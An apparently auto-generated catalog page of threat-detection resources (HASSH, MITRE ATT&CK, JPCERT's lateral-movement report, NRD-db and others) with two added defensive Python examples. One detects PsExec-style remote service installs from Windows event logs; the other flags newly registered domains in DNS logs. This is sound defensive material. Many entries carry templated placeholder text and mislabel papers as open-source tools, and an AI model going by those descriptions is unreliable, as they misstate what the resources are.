  • Website: https://www.sans.org/reading-room/whitepapers/threats/generating-hypotheses-successful-threat-hunting-37172
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Generating Hypotheses for Successful Threat Hunting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Letter H

This letter section contains 12 tools.

HASSH - a profiling method for SSH Clients and Servers

  • Website: https://engineering.salesforce.com/open-sourcing-hassh-abed3ae5044c
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: HASSH - a profiling method for SSH Clients and Servers is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

HASSH @BSides Canberra 2019 - Slides

  • Website: https://github.com/benjeems/Presentations/blob/master/BSides%202019%20%20-%20HASSH%20-%20a%20Profiling%20Method%20for%20SSH%20Clients%20and%20Servers.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: HASSH @BSides Canberra 2019 - Slides is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Have I Been Squatted

  • Website: https://haveibeensquatted.com
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Have I Been Squatted is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A fast domain typosquatting detection tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

HeadPrint: Detecting Anomalous Communications through Header-based Application Fingerprinting

  • Website: https://www.conand.me/publications/bortolameotti-headprint-2020.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: HeadPrint: Detecting Anomalous Communications through Header-based Application Fingerprinting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

HellsBells, Let's Hunt PowerShells!

  • Website: https://www.splunk.com/blog/2017/07/06/hellsbells-lets-hunt-powershells.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: HellsBells, Let's Hunt PowerShells! is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > PowerShell.

HTTP Client Fingerprinting Using SSL Handshake Analysis

  • Website: https://www.ssllabs.com/projects/client-fingerprinting/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: HTTP Client Fingerprinting Using SSL Handshake Analysis is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: (source code:.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

HTTPS traffic analysis and client identification using passive SSL/TLS fingerprinting

  • Website: https://link.springer.com/article/10.1186/s13635-016-0030-7
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: HTTPS traffic analysis and client identification using passive SSL/TLS fingerprinting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Hunt-Detect-Prevent

  • Website: https://github.com/MHaggis/hunt-detect-prevent
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Hunt-Detect-Prevent is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Lists of sources and utilities to hunt, detect and prevent evildoers.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Hunting for PowerShell Using Heatmaps

  • Website: https://medium.com/@jshlbrd/hunting-for-powershell-using-heatmaps-69b70151fa5d
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Hunting for PowerShell Using Heatmaps is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > PowerShell.

Hunting the Known Unknowns (with DNS)

  • Website: https://www.splunk.com/pdfs/events/govsummit/hunting_the_known_unknowns_with_DNS.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Hunting the Known Unknowns (with DNS) is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Hunting the Known Unknowns (With PowerShell)

  • Website: https://conf.splunk.com/files/2016/slides/hunting-the-known-unknowns-the-powershell-edition.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Hunting the Known Unknowns (With PowerShell) is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > PowerShell.

Hunting with Sysmon

  • Website: https://medium.com/@haggis_m/hunting-with-sysmon-38de012e62e6
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Hunting with Sysmon is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Letter I

This letter section contains 4 tools.

Introducing Event Query Language

  • Website: https://www.elastic.co/blog/introducing-event-query-language
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Introducing Event Query Language is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Introducing the Funnel of Fidelity

  • Website: https://posts.specterops.io/introducing-the-funnel-of-fidelity-b1bb59b04036
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Introducing the Funnel of Fidelity is a SpecterOps post by Jared Atkinson describing the Funnel of Fidelity, a model of how raw telemetry narrows stage by stage (collection, detection, triage, investigation, remediation), with fewer but higher-fidelity events at each stage. It is useful for deciding where in a detection pipeline engineering effort pays off and where analyst time is being spent on low-fidelity output. The source list's own summary for this entry is empty.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Investigating Windows Endpoints

  • Website: https://training.13cubed.com/investigating-windows-endpoints
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Investigating Windows Endpoints is a training course by Richard Davis (13Cubed) on investigating Windows endpoints, covering the artifacts an examiner collects and interprets during an intrusion investigation. The source list summarises it only as "by Richard Davis".

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Trainings.

Back to Name Jump

Investigation Scenario

  • Website: https://twitter.com/search?q=%23InvestigationPath%20from%3Achrissanders88&f=live
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Investigation Scenario is a running series of #InvestigationPath tweets by Chris Sanders, each posing a short investigation scenario and asking which evidence to pull and in what order; useful as triage practice for analysts. The linked page is a Twitter search for the hashtag, so its availability depends on the platform.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Letter J

This letter section contains 1 tool.

JPCERT - Detecting Lateral Movement through Tracking Event Logs

  • Website: https://blogs.jpcert.or.jp/en/2017/12/research-report-released-detecting-lateral-movement-through-tracking-event-logs-version-2.html
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: JPCERT - Detecting Lateral Movement through Tracking Event Logs is JPCERT/CC's research report (version 2) cataloguing the artifacts that common lateral-movement tools (PsExec, WMI, remote desktop, credential-dumping and pass-the-hash tooling, among others) leave in Windows event logs, the registry and the file system on both the source and the destination host, together with the audit settings needed to record them. It is a reference for deciding which event IDs to collect and which to correlate. The source list carries no summary beyond the title.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows.
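The practical use of such a catalogue is correlation: a tool like PsExec leaves a network logon (Security 4624, logon type 3) on the target followed within seconds by a service installation (System 7045). The following is an added example written for this page, not code or data from the JPCERT report; the event records are constructed, and the five-minute window and field names are assumptions of the example.

```python
# Added example: correlate a network logon (Security 4624, logon type 3) with
# a service installation (System 7045) on the same host shortly after, the
# trace that remote-execution tools such as PsExec leave in Windows event
# logs. Records below are constructed, not taken from the JPCERT report.
from collections import defaultdict
from datetime import datetime, timedelta

EVENTS = [
    {"time": "2024-03-01T09:00:00", "host": "SRV1", "channel": "Security", "event_id": 4624,
     "logon_type": 3, "account": "CORP\\jdoe", "src_ip": "10.0.0.5"},
    {"time": "2024-03-01T09:00:04", "host": "SRV1", "channel": "System", "event_id": 7045,
     "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe"},
    # SRV2: network logon only (ordinary file-share access), no service install
    {"time": "2024-03-01T09:10:00", "host": "SRV2", "channel": "Security", "event_id": 4624,
     "logon_type": 3, "account": "CORP\\backup$", "src_ip": "10.0.0.20"},
    # SRV3: service installed from an interactive session (logon type 2), no network logon
    {"time": "2024-03-01T09:20:00", "host": "SRV3", "channel": "Security", "event_id": 4624,
     "logon_type": 2, "account": "CORP\\admin", "src_ip": "127.0.0.1"},
    {"time": "2024-03-01T09:20:30", "host": "SRV3", "channel": "System", "event_id": 7045,
     "service_name": "Spooler2", "image_path": "C:\\Windows\\System32\\svc.exe"},
    # SRV4: network logon, but the service install comes an hour later (outside the window)
    {"time": "2024-03-01T10:00:00", "host": "SRV4", "channel": "Security", "event_id": 4624,
     "logon_type": 3, "account": "CORP\\jdoe", "src_ip": "10.0.0.5"},
    {"time": "2024-03-01T11:00:00", "host": "SRV4", "channel": "System", "event_id": 7045,
     "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe"},
]


def ts(event):
    return datetime.fromisoformat(event["time"])


def remote_service_installs(events, window=timedelta(minutes=5)):
    """One alert per 7045 that follows a type-3 logon on the same host within
    `window`. The logon's source IP and account become the pivot for the
    investigation: which host did the operator come from, and as whom?"""
    network_logons = defaultdict(list)
    for e in events:
        if e["event_id"] == 4624 and e.get("logon_type") == 3:
            network_logons[e["host"]].append(e)

    alerts = []
    for e in sorted(events, key=ts):
        if e["event_id"] != 7045:
            continue
        candidates = [l for l in network_logons[e["host"]]
                      if timedelta(0) <= ts(e) - ts(l) <= window]
        if not candidates:
            continue
        logon = max(candidates, key=ts)          # most recent qualifying logon
        alerts.append({"host": e["host"], "service": e["service_name"],
                       "image": e["image_path"], "account": logon["account"],
                       "src_ip": logon["src_ip"],
                       "delta_s": int((ts(e) - ts(logon)).total_seconds())})
    return alerts


def pivot_hosts(alerts):
    """Source addresses behind the alerts: the next hosts to examine."""
    return sorted({a["src_ip"] for a in alerts})


if __name__ == "__main__":
    found = remote_service_installs(EVENTS)
    for a in found:
        print(a)
    print("pivot to:", pivot_hosts(found))
```

Only SRV1 fires. The correlation needs both channels (Security and System) forwarded from the same host with synchronised clocks, and the audit policy must actually log 4624 for network logons; the report's value is in spelling out those prerequisites per tool.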

Back to Name Jump

Letter L

This letter section contains 1 tool.

Lessons Learned in Detection Engineering

  • Website: https://medium.com/starting-up-security/lessons-learned-in-detection-engineering-304aec709856
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Lessons Learned in Detection Engineering is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: An experienced detection engineer describes in detail his observations, challenges, and recommendations for building an effective threat detection program.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Letter M

This letter section contains 9 tools.

MaGMa Use Case Definition Model

  • Website: https://www.betaalvereniging.nl/wp-content/uploads/FI-ISAC-use-case-framework-verkorte-versie.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: MaGMa Use Case Definition Model (Management, Growth, Metrics and assessment) is the FI-ISAC use case framework for planning and defining threat detection use cases; the linked PDF is the abridged version. Source summaries describe it as: A business-centric approach for planning and defining threat detection use cases.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

Markov Chain Fingerprinting to Classify Encrypted Traffic

  • Website: https://drakkar.imag.fr/IMG/pdf/1569811033.pdf
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Markov Chain Fingerprinting to Classify Encrypted Traffic is a research paper proposing fingerprints of encrypted sessions built from Markov chains over the sequence of message types observed in an SSL/TLS session, so that the application behind a flow can be classified without decrypting payloads. It is relevant to detecting malware or tunnelling that hides inside TLS. The source list carries no summary beyond the title.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

MITRE ATT&CK

  • Website: https://attack.mitre.org/wiki/Main_Page
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: MITRE ATT&CK is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

MITRE ATT&CK Navigator

  • Website: https://mitre.github.io/attack-navigator/enterprise/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: MITRE ATT&CK Navigator is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: The ATT&CK Navigator is designed to provide basic navigation and annotation of ATT&CK matrices, something that people are already doing today in tools like Excel.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

MITRE CAR

  • Website: https://car.mitre.org/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: MITRE CAR is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: The Cyber Analytics Repository is a knowledge base of analytics developed by MITRE based on the Adversary Tactics, Techniques, and Common Knowledge (ATT&CK™) adversary model.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Detection Rules.

Back to Name Jump

MITRE Engage

  • Website: https://engage.mitre.org/
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: MITRE Engage is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A framework for planning and discussing adversary engagement operations that empowers you to engage your adversaries and achieve your cybersecurity goals.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

MITRE's Adversary Emulation Plans

  • Website: https://attack.mitre.org/wiki/Adversary_Emulation_Plans
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: MITRE's Adversary Emulation Plans are MITRE's published plans (the first covering APT3) that turn the ATT&CK techniques attributed to a group into an ordered, repeatable set of actions a red or purple team can execute, so that detection coverage is tested against realistic tradecraft rather than isolated atomic tests. The source list carries no summary beyond the title.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Threat Simulation Resources.

Back to Name Jump

Monitoring macOS hosts with osquery

  • Website: https://blog.kolide.com/monitoring-macos-hosts-with-osquery-ba5dcc83122d
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Monitoring macOS hosts with osquery is a Kolide blog post on using osquery to monitor macOS hosts. The source list carries no summary beyond the title.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Osquery.

Back to Name Jump

Mordor

  • Website: https://github.com/Cyb3rWard0g/mordor
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: Mordor is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files. The data is categorized by platforms, adversary groups, tactics and techniques defined by the Mitre ATT&CK Framework. Note that the project has since moved to the OTRF Security-Datasets repository; check there for current datasets.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Dataset.

Back to Name Jump

Letter N

This letter section contains 2 tools.

NIST Cybersecurity Framework

  • Website: https://www.nist.gov/cyberframework
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection, Awesome SOC

What it does: NIST Cybersecurity Framework is NIST's voluntary framework that organises cybersecurity outcomes into core functions (Identify, Protect, Detect, Respond, Recover, with Govern added in version 2.0); detection programs map their capabilities and gaps to the categories under the Detect function. It is a document, not software, despite the catalog's "Open Source" tag. The source list carries no summary beyond the title.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

NRD-db

  • Website: https://github.com/StrackVibes/NRD-db
  • Model: Open Source
  • Category: Threat Detection
  • Source Lists: Awesome Threat Detection

What it does: NRD-db is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Automatically fetches and stores newly registered domains in a Redis database.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.
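The detection use of a newly-registered-domain store is enrichment: a DNS query for a domain registered days ago is a strong signal on its own. The following is an added example written for this page, not NRD-db's own code. NRD-db keeps its data in Redis; here the store is an in-memory dict so the example runs offline, and the domains, registration dates, allowlist and log lines are all constructed assumptions.

```python
# Added example: enrich DNS query logs with a newly-registered-domain (NRD)
# store of the kind NRD-db maintains. Stand-in for Redis: an in-memory dict.
# Domains, dates and log lines are constructed, not real data.
from datetime import date

# registered domain -> registration date (assumption: what the store holds)
NRD_STORE = {
    "invoice-portal-secure.com": date(2024, 5, 28),
    "corp-login-update.net": date(2024, 5, 30),
    "example.com": date(1995, 8, 14),
}
ALLOWLIST = {"example.com"}      # known-good domains never alerted on

# Constructed DNS query log: "<date> <client_ip> <qname> <qtype>"
DNS_LOG = """\
2024-06-01 10.0.0.12 www.example.com A
2024-06-01 10.0.0.12 cdn.invoice-portal-secure.com A
2024-06-01 10.0.0.31 mail.corp-login-update.net MX
2024-06-01 10.0.0.31 intranet.corp.local A
"""


def registered_domain(qname):
    """Last two labels. Caveat: multi-label public suffixes (co.uk, com.au)
    need the Public Suffix List; a production version should use it."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def new_domain_hits(log_text, store=NRD_STORE, max_age_days=30, allow=ALLOWLIST):
    """Return queries whose registered domain was registered within
    `max_age_days` of the query. Domains absent from the store are skipped:
    the NRD feed only says something about domains it has seen registered."""
    hits = []
    for line in log_text.splitlines():
        day, client, qname, qtype = line.split()
        reg = registered_domain(qname)
        if reg in allow or reg not in store:
            continue
        age = (date.fromisoformat(day) - store[reg]).days
        if 0 <= age <= max_age_days:
            hits.append({"client": client, "qname": qname, "registered_domain": reg,
                         "age_days": age, "qtype": qtype})
    return hits


if __name__ == "__main__":
    for hit in new_domain_hits(DNS_LOG):
        print(hit)
```

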